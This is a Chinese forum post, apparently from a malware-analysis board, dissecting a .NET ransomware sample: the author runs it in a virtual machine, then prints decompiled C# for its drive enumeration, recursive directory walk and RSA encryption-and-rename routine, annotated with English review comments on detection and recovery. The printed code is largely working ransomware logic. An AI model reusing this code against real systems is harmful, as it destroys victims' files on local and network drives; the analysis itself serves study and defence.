响应车长,反编译一波。
本人小白,没啥技术,就随便看看这毒
先简单执行一下
嗯,很好,虚拟机惨遭破坏
监控行为发现这破程序疯狂地在各个目录下面写入文件,毕竟勒索(笑)
大部分相同,但还是在一个单独的目录写入了一个log文件
虽然不知道是什么但还是感觉很厉害的样子
查下壳
.NET,果断反编译看看
[mw_shl_code=javascript,true]// ntmps.Form1
/// <summary>
/// Per-directory step of the walk. First calls this.b(string, ...) and
/// this.e(string) on the directory path (neither overload is on this page;
/// given the per-directory file writes the author observed, plausibly the
/// ransom-note drop — TODO confirm), then hands every matching file that sits
/// directly in A_0 to c(string, string) for encryption. Not recursive; the
/// recursion lives in b(DirectoryInfo).
/// </summary>
/// <param name="A_0">Directory whose direct child files are processed.</param>
/// <remarks>
/// NOTE(review): b, c and e appear both as methods and as fields (this.b,
/// this.c, this.e) — obfuscator-assigned names that are legal in IL but
/// collide in C#, so this decompiler output does not compile as-is.
/// </remarks>
private void a(DirectoryInfo A_0)
{
this.b(A_0.FullName, this.j);
this.e(A_0.FullName);
try
{
string[] files = Directory.GetFiles(A_0.FullName, "*.*");
for (int i = 0; i < files.Length; i++)
{
// NOTE(review): almost certainly `files[i]` in the decompiler output; the
// forum's bbcode reads `[i]` as an italics tag and dropped it (same
// artefact in b() and h() below).
string text = files;
// this.l: presumably the list of targeted name fragments/extensions —
// TODO confirm; nothing on this page shows its contents.
foreach (string current in this.l)
{
// Case-insensitive substring match on the whole path (not a strict
// extension check). Paths already containing the appended extension
// this.e are skipped, so a file is not encrypted twice across runs.
if (text.ToLower().IndexOf(current) > -1 && text.ToLower().IndexOf(this.e.ToLower()) < 0)
{
string a_ = text;
// Output name = original name + "." + this.e (the rename happens in c()).
string a_2 = text + "." + this.e;
// If more than one entry of this.l matches the same path, c() is called
// again for a file that was already renamed; its read then fails and is
// swallowed inside c().
this.c(a_, a_2);
}
}
}
}
// Blanket catch: access-denied, locked or over-long paths are silently
// skipped so the walk never aborts. These failures are not reported by the
// code shown here; they surface only as failed-access events in
// file-audit/EDR telemetry.
catch
{
}
}
[/mw_shl_code]
[mw_shl_code=javascript,true]// ntmps.Form1
/// <summary>
/// Depth-first recursion over the directory tree rooted at A_0: for each
/// subdirectory it first runs a(DirectoryInfo) (encrypt the files directly
/// inside it), then recurses with b(DirectoryInfo). Files sitting directly
/// in A_0 itself are never handed to a() — for drive roots (see h()) the
/// top-level files are left alone.
/// </summary>
/// <param name="A_0">Directory whose subtree is walked.</param>
private void b(DirectoryInfo A_0)
{
try
{
// No exclusion list is visible in this block (a() filters by file name
// only), so system directories are walked too — whatever this.l matches.
DirectoryInfo[] directories = A_0.GetDirectories();
for (int i = 0; i < directories.Length; i++)
{
// NOTE(review): `directories[i]` in the decompiler output; `[i]` was
// eaten by the forum's bbcode italics tag.
DirectoryInfo a_ = directories;
this.a(a_);
this.b(a_);
}
}
// GetDirectories throws on access-denied and similar; the exception is
// swallowed and that subtree is skipped silently, so a single unreadable
// directory never stops the walk.
catch
{
}
}
[/mw_shl_code]
嗯,这些应该就是在遍历文件夹了
[mw_shl_code=javascript,true]// ntmps.Form1
/// <summary>
/// Entry point of the file walk: enumerates every logical drive and starts
/// b(DirectoryInfo) at the root of each fixed or network drive. Removable
/// and optical drives are skipped. Because mapped network drives are in
/// scope, any share the running user can write to is encrypted as well —
/// least-privilege share ACLs limit the blast radius, and a single client
/// bursting writes/renames across a share is a usable detection signal.
/// </summary>
private void h()
{
try
{
string[] logicalDrives = Environment.GetLogicalDrives();
for (int i = 0; i < logicalDrives.Length; i++)
{
// NOTE(review): `logicalDrives[i]` in the decompiler output; `[i]` was
// eaten by the forum's bbcode italics tag.
DriveInfo driveInfo = new DriveInfo(logicalDrives);
if (driveInfo.DriveType == DriveType.Fixed || driveInfo.DriveType == DriveType.Network)
{
// b() only descends into subdirectories, so files sitting directly in
// the drive root are not encrypted.
this.b(driveInfo.RootDirectory);
}
}
}
// The try wraps the whole loop: should anything inside it throw (e.g. a
// disconnected network drive), the remaining drives in the list are
// skipped entirely, not just the failing one.
catch
{
}
}
[/mw_shl_code]
太狠了,遍历全部文件,估计有写入权限的它都写进去
怪不得虚拟机那么惨。。
[mw_shl_code=javascript,true]// ntmps.Form1
/// <summary>
/// RSA-encrypts a string block by block and returns the ciphertext re-decoded
/// as a string. Steps visible here: right-pad A_0 with spaces up to a multiple
/// of this.b characters, take its bytes in the system ANSI code page
/// (Encoding.Default), reverse the byte order, then encrypt each this.b-byte
/// block with the RSA key imported from the XML string this.i. The
/// Encrypt(..., false) overload is PKCS#1 v1.5 padding, whose 11-byte overhead
/// is where the "+ 11" sizing comes from. Which string the caller passes in is
/// not visible on this page (the author mentions a separately written log
/// file — TODO confirm).
/// </summary>
/// <param name="A_0">Plaintext to encrypt (the parameter is reassigned while padding; the caller's string is unaffected).</param>
/// <returns>
/// The concatenated ciphertext blocks decoded with Encoding.Default, or "" (or
/// a partial result) if anything in the RSA part throws. Decoding arbitrary
/// ciphertext bytes through an ANSI code page is likely lossy, so this string
/// is probably not round-trippable — TODO confirm against the consumer.
/// </returns>
/// <remarks>
/// NOTE(review): no key generation happens here. RSACryptoServiceProvider(2048)
/// just sets a key size and FromXmlString(this.i) replaces it with the key
/// embedded in this.i; Encrypt only needs the public components. Whether
/// this.i also carries private parameters is not visible on this page.
/// </remarks>
private string a(string A_0)
{
string text = "";
// array and bytes are immediately replaced below (at GetBytes and at
// Encrypt respectively); only array2 is used as allocated here.
byte[] array = new byte[A_0.Length];
byte[] array2 = new byte[this.b];
byte[] bytes = new byte[this.b + 11];
// Number of this.b-sized blocks needed for the input.
double num = Math.Ceiling((double)A_0.Length / (double)this.b);
if ((double)A_0.Length < num * (double)this.b)
{
int length = A_0.Length;
int num2 = 0;
// Space-pad so the length becomes an exact multiple of this.b.
while ((double)num2 < num * (double)this.b - (double)length)
{
A_0 += " ";
num2++;
}
}
// Encoding.Default is the system ANSI code page, so the bytes (and hence
// the ciphertext) depend on the victim machine's locale.
array = Encoding.Default.GetBytes(A_0);
Array.Reverse(array);
try
{
RSACryptoServiceProvider rSACryptoServiceProvider = new RSACryptoServiceProvider(2048);
rSACryptoServiceProvider.FromXmlString(this.i);
int num3 = 0;
while ((double)num3 < num)
{
Array.Copy(array, num3 * this.b, array2, 0, this.b);
// false => PKCS#1 v1.5 padding (not OAEP); each block becomes one
// modulus-sized ciphertext.
bytes = rSACryptoServiceProvider.Encrypt(array2, false);
text += Encoding.Default.GetString(bytes);
num3++;
}
}
// A malformed key in this.i, or a block longer than the key allows, ends
// the loop silently and whatever was encrypted so far is returned.
catch
{
}
return text;
}[/mw_shl_code]
中间根据一大堆引用的变量进行计算
应该就是在进行计算RSA私钥了
(反编译出来的变量一点一点追着看得疯,就不追那么具体了)
[mw_shl_code=javascript,true]private void c(string A_0, string A_1)
{
// Encrypts the head of the file at A_0 with RSA and renames it to A_1.
//   A_0: path of the file to encrypt (read, overwritten in place, then moved).
//   A_1: destination path (a() passes the original name + "." + this.e).
// Only the first this.c blocks of this.b bytes are RSA-encrypted (key from
// the XML string this.d; Encrypt(..., false) = PKCS#1 v1.5, 11 bytes of
// padding overhead per block, so each block grows to this.b + 11 bytes).
// Everything after that head is copied into the output verbatim, so the
// tail of every encrypted file is still plaintext — useful for carving and
// for assessing what was actually lost. Files too small for the size gate
// below are left completely untouched (not renamed either).
byte[] array = new byte[this.b];
try
{
// Whole file in memory; a file locked by another process fails here and
// is skipped silently by the outer catch.
byte[] array2 = File.ReadAllBytes(A_0);
// Size gate: roughly (this.c + 5) * this.b bytes or more. Smaller files
// never reach the encryption path.
if (array2.Length / (this.c + 5) >= this.b)
{
RSACryptoServiceProvider rSACryptoServiceProvider = new RSACryptoServiceProvider(2048);
// Imports the key embedded in this.d (a different XML string from the
// this.i used by a(string)). Encrypt needs only the public part; whether
// the private parameters exist anywhere in the binary is not visible on
// this page — without them the encrypted head cannot be recovered.
rSACryptoServiceProvider.FromXmlString(this.d);
// Output = this.c encrypted blocks of (this.b + 11) bytes + plaintext tail.
// The arithmetic assumes the key's modulus is exactly this.b + 11 bytes.
byte[] array3 = new byte[array2.Length + this.c * 11];
byte[] array4 = new byte[array2.Length - this.c * this.b];
for (int i = 0; i < this.c; i++)
{
Array.Copy(array2, this.b * i, array, 0, this.b);
byte[] array5 = rSACryptoServiceProvider.Encrypt(array, false);
Array.Copy(array5, 0, array3, i * (this.b + 11), array5.Length);
}
// Unencrypted remainder appended after the encrypted head.
Array.Copy(array2, this.c * this.b, array4, 0, array4.Length);
Array.Copy(array4, 0, array3, this.c * (this.b + 11), array4.Length);
try
{
// Read whole file -> overwrite same path -> rename with new extension:
// the classic ransomware I/O pattern that canary files and EDR
// rename-burst rules key on. Overwriting in place is what makes the
// original content hard to recover; whether on-disk clusters are reused
// is filesystem-dependent, and nothing on this page touches shadow
// copies (worth checking the rest of the binary).
File.WriteAllBytes(A_0, array3);
// If the move fails (e.g. A_1 already exists) the file stays encrypted
// under its original name, and a()'s name-based skip will not recognise
// it on a later run.
File.Move(A_0, A_1);
}
catch
{
}
}
}
catch
{
}
}
[/mw_shl_code]
激动人心的代码来了,各种文件数据读取加密写入一气呵成
总结
C#写这种勒索虽然快,但是想隐藏行为几乎是不可能的,这个代码完完全全暴露在反编译的软件下面
其行为也非常单一,无非就是采用RSACryptoServiceProvider之类的加密函数做加密,估计也没啥太大的花样
勒索软件这些东西越来越不厚道,照这毒这整法,实体机中招的话估计是没救了